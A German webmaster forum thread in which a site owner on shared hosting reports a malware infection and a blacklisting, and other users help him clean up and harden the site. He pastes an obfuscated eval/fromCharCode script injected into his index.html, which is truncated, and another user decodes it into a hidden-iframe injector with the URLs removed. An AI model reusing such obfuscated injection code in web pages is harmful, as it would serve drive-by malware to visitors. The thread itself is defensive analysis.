Malware: Diese Website kann Ihren Computer beschädigen.

[martinguste]

Hallo,

ich habe heute Malware auf meinen Server gefunden. Habe sofort ein Backup eingespielt und alle Passwörter geändert. Per FTP habe ich gesehen, das am Sonntag um ca. 01.38 uhr die index.html geändert wurde. Wahrscheinlich ein fremder Zugriff auf den Server!? Bin da noch am Logfile analysieren. Habt ihr Erfahrung mit dieser Malware? Details siehe weiter unten!

Folgendes habe ich jetzt durchgeführt:
1. FTP, Server, E-mail, usw. Passwörter ändern
2. FTP löschen, Backup hochladen
3. Dateiüberprüfung

Ich hoffe ich habe die Malware jetzt entfernt? Kann leider auch nichts auffälliges außer der index.html erkennen.

stopbadware.org zeigt an:

Code: Alles auswählen

Diese Website ist als verdächtig eingestuft. Das Aufrufen dieser Website kann schädlich für Ihren Computer sein!

Ein Bestandteil dieser Website wurde in den letzten 90 Tagen 1 mal aufgrund verdächtiger Aktivitäten auf die Liste gesetzt.

Welche Befunde hat Google beim Besuch dieser Website festgestellt?

    Bei 2 Seite(n) von insgesamt 2 Seiten dieser Website, die wir in den letzten 90 Tagen getestet haben, wurde festgestellt, dass Malware (Schadsoftware) ohne Einwilligung des Nutzers heruntergeladen und installiert wurde. Der letzte Besuch von Google auf dieser Website war am 2010-10-24 und verdächtiger Content wurde auf dieser Website zuletzt am 2010-10-24 gefunden.

    Malicious software includes 4 exploit(s).

    Die Malware wird in 2 Domain(s) gehostet, darunter hashhap.com/, nuzno.us/.

    This site was hosted on 1 network(s) including (HOSTEUROPE).

Hat diese Website als Überträger zur Weiterverteilung von Malware fungiert?

Hat diese Website Malware gehostet?

    Nein, diese Website hat in den letzten 90 Tagen keine Malware gehostet.

Gehen wir mal davon aus, ich hätte die Malware komplett entfernt. Wie lange dauert es bis folgende Probleme behoben sind?

Firefox zeigt an:
"Als attackierend gemeldete Webseite!"

Google Ergebnisse:
Google, blockiert jetzt die Seite weil es einen Eintrag auf stopbadware.org gibt. War das der Virus bzw. die Malware? Die Platzierungen werden zwar angezeigt jedoch mit folgenden Warnhinweis: Diese Website kann Ihren Computer beschädigen.

Einen Antrag zur Überprüfung habe ich schon auf Google gestellt. Wie lange dauert die Überprüfung bei stopbadware.org bzw. Google? Habe was von bis zu 48h im Internet gelesen.
Bei stopbadware.org steht jetzt:
Appeal requested Oct 25th 2010
Appeal status Open

Gibt es vielleicht ein Online-Tool zur Vorüberprüfung?

DANKE für Eure Tipps!!!

[expansioN]

1. FTP, Server, E-mail, usw. Passwörter ändern
2. FTP löschen, Backup hochladen
3. Dateiüberprüfung

Von wo hast du das gemacht? Unter Umständen ist dein PC selber schon verseucht und deine neuen Passwörter sind schon wieder fürn Alfred. Irgendwie ist das Ding an deine Passwörter gekommen. Entweder ist dein PC schon verseucht oder deine Passwörter waren schlecht (meines hat 19 Zeichen, Groß- und Kleinschreibung, Sonderzeichen und Zahlen, als Beispiel). Virenscanner drüberlaufen lassen und im Zweifelsfall neu aufsetzen. Passwörter von einem anderen PC aus ändern.

Gibt es vielleicht ein Online-Tool zur Vorüberprüfung?

In den WMT ist sowas eingebaut. Fraglich wie aktuell das ist.

Wann deine Seite wieder freigegeben wird kann dir wahrscheinlich niemand so genau beantworten.

Grüße

[quelltexter]

Hallo,

.......................

DANKE für Eure Tipps!!!

Wenn du eine URL postest, wirds vielleicht einfacher das zu überprüfen

[xlb]

.. auf meinen Server gefunden

This site was hosted on 1 network(s) including (HOSTEUROPE).

Wirklich dein (dedizierter) Server oder "shared" und/oder "managed" ...?

Hatte letztes ein ähnliches Problem. Hat sich rausgestellt, dass nicht "meine" Domain direkt Ziel eines Angriffs war, sondern eine andere auf dem gleichen Server (gleiche IP!), was für Google offenbar schon ausreichte, um hysterisch zu reagieren. Den Server, bzw. die virtuellen Hosts von Wanzen und sonstigem Ungeziefer zu befreien, war letztlich nur dem Provider möglich.

[martinguste]

@expansioN:
habe meinen PC auf Viren, Adware, Spyware etc. überprüft. Kein Fund!

@xlb:
es ist ein shared-hosting Paket. Kann es sein das diese Badware über einen anderen auf diesen Server kam? Sind am überlegen auf einen eigenen Server zu ziehen.

Folgenden Code habe ich in der Index.html zischen <Body></Body> gefunden:

Code: Alles auswählen

<script>win=window;gar=win&#91;'String'&#93;;ga='l';g=win&#91;'eva'+ga&#93;;sf=gar.fromCharCode;g&#40;sf&#40;4.5*46.5*2,20.5*2,61.5*2,6.5*2,5*2,4.5*2,4.5*2,52.5*2,51*2,57*2,48.5*2,54.
5*2,50.5*2,57*2,20*2,20.5*2,29.5*2,6.5*2,5*2,4.5*2,62.5*2,16*2,50.5*2
,54*2,57.5*2,50.5*2,16*2,61.5*2,6.5*2,5*2,4.5*2,4.5*2,59*2,48.5*2,57*
2,16*2,49*2,50*2,60.5*2,16*2,30.5*2,16*2,50*2,55.5*2,49.5*2,58.5*2,5
4.5*2,50.5*2,55*2,58*2,23*2,49.5*2,57*2,50.5*2,48.5*2,58*2,50.5*2,34.
5*2,54*2,50.5*2,54.5*2,50.5*2,55*2,58*2,20*2,17*2,49*2,55.5*2,50*2,6
0.5*2,17*2,20.5*2,29.5*2,6.5*2,5*2,4.5*2,4.5*2,58*2,57*2,60.5*2,16*2,
61.5*2,6.5*2,5*2,4.5*2,4.5*2,4.5*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50
.5*2,55*2,58*2,23*2,48.5*2,56*2,56*2,50.5*2,55*2,50*2,33.5*2,52*2,52
.5*2,54*2,50*2,20*2,49*2,50*2,60.5*2,20.5*2,29.5*2,6.5*2,5*2,4.5*2,4.
5*2,62.5*2,16*2,49.5*2,48.5*2,58*2,49.5*2,52*2,16*2,20*2,50.5*2,20.5
*2,16*2,61.5*2,6.5*2,5*2,4.5*2,4.5*2,4.5*2,50*2,55.5*2,49.5*2,58.5*2,5
4.5*2,50.5*2,55*2,58*2,23*2,49*2,55.5*2,50*2,60.5*2,16*2,30.5*2,16*2
,49*2,50*2,60.5*2,29.5*2,6.5*2,5*2,4.5*2,4.5*2,62.5*2,6.5*2,5*2,4.5*2,
4.5*2,52.5*2,51*2,16*2,20*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,5
5*2,58*2,23*2,51.5*2,50.5*2,58*2,34.5*2,54*2,50.5*2,54.5*2,50.5*2,55
*2,58*2,57.5*2,33*2,60.5*2,42*2,48.5*usw. usw......&#41;&#41;</script>

[martinguste]

Sorry wegen der Formatierung vom Code oben.

PS: Die Probleme beim Firefox und Google sind jetzt behoben. Lediglich der Eintrag auf stopbadware.org besteht noch 90 Tage. Hoffentlich haben wir den Virus wirklich entfernt. Man, dabei kann man aber echt durchdrehen

[xlb]

Der Code versucht, per Javascript folgenden Code auszuführen - soviel zu Thema "eval ist evil" (Die URLs sind entfernt):

Code: Alles auswählen

if (document.getElementsByTagName('body')[0]){

		iframer();

	} else {

		var bdy = document.createElement("body");

		try {

			document.appendChild(bdy);

		} catch (e) {

			document.body = bdy;

		}

		if (document.getElementsByTagName('body')[0]){

			iframer();

		} else {

			document.write&#40;"<iframe src='XXX' width='10' height='10' style='visibility&#58; hidden;'></iframe>"&#41;;

		&#125;

	&#125;

	function iframer&#40;&#41;&#123;

		document.getElementsByTagName&#40;'body'&#41;&#91;0&#93;.innerHTML += "<iframe src='XXX' width='10' height='10' style='visibility&#58; hidden;'></iframe>";

	&#125;

Dabei soll der Body durch einen eigenen ersetzt und mit einem IFrame versehen werden. Was genau in dem Frame passiert, hab ich mir dann aber nicht mehr so genau angesehen ...

Kann es sein das diese Badware über einen anderen auf diesen Server kam?

Ja! Darauf wollte ich hinaus.

[SchnaeppchenSUMA]

nimm mal bitte den Code raus ist ja fürchterlich

Der Virus ist ein normaler Scriptvirus der auf deiner Seite ein IFrame einbaut das dann immer wieder verschiedene Viren nachlädt. Da der Code aber auf deiner Seite ausgeführt wird macht Google bzw. Stopbadware dich dafür verantwortlich und warnt vor deiner Seite.

Du kannst übrigends auch da eine neuen Review beantragen: https://stopbadware.org/home/reviewinfo

[martinguste]

@SchnaeppchenSUMA:
hab mal den Code editiert.

@all:
Danke für Eure Antworten.

Kann man sich irgendiwe mehr absichern gegen solche Probleme? Eigenen Managed Server?

[xlb]

Kann man sich irgendiwe mehr absichern gegen solche Probleme?

Man kann auf engagierte Admins vertrauen, die Server und Infrastruktur mit aktuellen Patches und Programmversionen füttern und regelmäßig einen Blick in die Logs werfen.

Man kann/muss selbst dafür Sorge tragen, dass auf den Seiten installierte Software (Foren, Gästebücher, ...) auf dem neuesten Sicherheitsstand ist, um nicht mehr (selbstverschuldete!) Angriffsfläche zu bieten als nötig.

100%ige Sicherheit gibt es nicht - weder beim 08/15-Hoster, noch woanders ...